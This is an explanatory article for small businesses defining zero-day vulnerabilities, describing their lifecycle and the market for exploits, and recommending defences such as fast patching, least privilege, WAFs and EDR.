A zero-day vulnerability is a security flaw in software that is being actively exploited by attackers before the vendor knows about it — or before a patch is available. The "zero" refers to the number of days defenders have had to fix it: zero. By definition, there's no update to apply, no signature for antivirus to match, and no official mitigation from the software maker.
Zero-days are among the most dangerous threats in security, and the most misunderstood. The term is often used loosely to mean any unpatched flaw — but the precise meaning is a vulnerability that is unknown to the vendor at the time of exploitation.
How zero-days are discovered and exploited
Vulnerabilities are found by many parties:
- Security researchers — who typically report responsibly to the vendor (responsible disclosure) and wait for a patch before publishing details
- Vendors' own security teams — through code review, fuzzing and internal testing
- Criminal groups and nation-states — who actively hunt for flaws and keep them secret to exploit, rather than reporting them
- Vulnerability brokers — who buy and sell zero-day exploits, sometimes to governments and sometimes to criminal markets
When an attacker finds (or buys) a zero-day, they have a window — potentially weeks or months — to exploit it against any vulnerable target before the vendor patches it. High-value zero-days in widely-used software (operating systems, VPNs, Exchange, browsers) can be worth millions of dollars on exploit markets.
The lifecycle of a zero-day
- Discovery — attacker finds the flaw, unknown to the vendor
- Weaponisation — attacker builds a reliable exploit
- Active exploitation — targets are attacked; this may be targeted (one organisation) or mass-scale (scanning the internet for vulnerable instances)
- Discovery by defenders — incident responders, threat intelligence or the vendor detects exploitation
- Disclosure and patch — vendor is notified (or discovers independently), develops a fix, issues a CVE
- Patch window — organisations race to apply the patch before the now-public exploit is used by a wider range of attackers
Once a patch is released, the vulnerability is no longer a zero-day — but it becomes an N-day vulnerability, exploited by attackers who know most organisations won't patch quickly.
Are zero-days a realistic threat for small businesses?
Directly targeted zero-day attacks — a nation-state using a custom exploit against your specific organisation — are rare for small businesses. But zero-days matter to you in two indirect ways:
- Mass exploitation — when a zero-day in widely-used software (a VPN, a mail server, a WordPress plugin) is publicly disclosed, attackers immediately scan the entire internet for vulnerable instances. Small businesses running unpatched software are hit alongside large ones.
- Supply-chain exposure — a zero-day in a third-party service you use (a CRM, a payment processor, an email platform) can expose your customer data even if your own systems are secure.
How to reduce your zero-day exposure
You can't patch a zero-day before it's patched. But you can make exploitation harder and limit blast radius:
Patch everything else fast
Most successful attacks use known vulnerabilities, not zero-days. Organisations that patch quickly close the window between disclosure and exploitation. Critical patches (especially for internet-facing systems) should be applied within hours, not weeks. Zero-days are the threat you can't patch; everything else is negligence if unpatched.
Reduce your attack surface
Zero-days need something to exploit. Disable services you don't use, don't expose admin panels to the internet, restrict RDP and SSH to VPN or known IPs, and remove software you don't actively need. Every running service is potential attack surface.
Use a WAF and virtual patching
A WAF can detect and block known attack patterns — including attempts to exploit a vulnerability even before the software vendor patches it. Some WAF providers (Cloudflare, AWS) push virtual patch rules within hours of a zero-day disclosure, giving you protection before the official fix arrives.
Principle of least privilege
If an attacker exploits a zero-day in your web server, how much can they do with it? If the process runs as root with access to your entire filesystem, the answer is "everything." If it runs as a limited user with access only to what it needs, the blast radius shrinks dramatically. Apply this everywhere: services, user accounts, API keys, database permissions.
Endpoint detection and response (EDR)
EDR tools detect exploitation behaviour (shellcode execution, unusual process spawning, memory injection) rather than looking for known malware signatures. They can catch zero-day exploitation attempts that traditional antivirus misses entirely.
Threat intelligence and monitoring
Subscribe to vendor security advisories for every major software you run. Follow CISA's Known Exploited Vulnerabilities catalogue — it lists vulnerabilities actively exploited in the wild, including newly disclosed ones. Speed of awareness is speed of response.
FAQ
Is a zero-day the same as a CVE?
No. A CVE (Common Vulnerabilities and Exposures) is a public identifier assigned to a known vulnerability, usually when it's disclosed. A zero-day is exploited before a CVE exists — or at the same time disclosure and exploitation happen simultaneously. Once it has a CVE and a patch, it's technically no longer a zero-day.
How long does a zero-day stay "zero-day"?
Until the vendor releases a patch. This ranges from hours (if the vendor is already aware or responds quickly) to months or years (for complex vulnerabilities, or when attackers deliberately keep them secret).
Should small businesses worry about zero-days?
Focus on the basics first: patching known vulnerabilities, enabling 2FA, configuring email authentication, reducing attack surface. Zero-days are a threat, but unpatched known vulnerabilities are responsible for the vast majority of real-world breaches. Fix the known problems and you're ahead of most targets.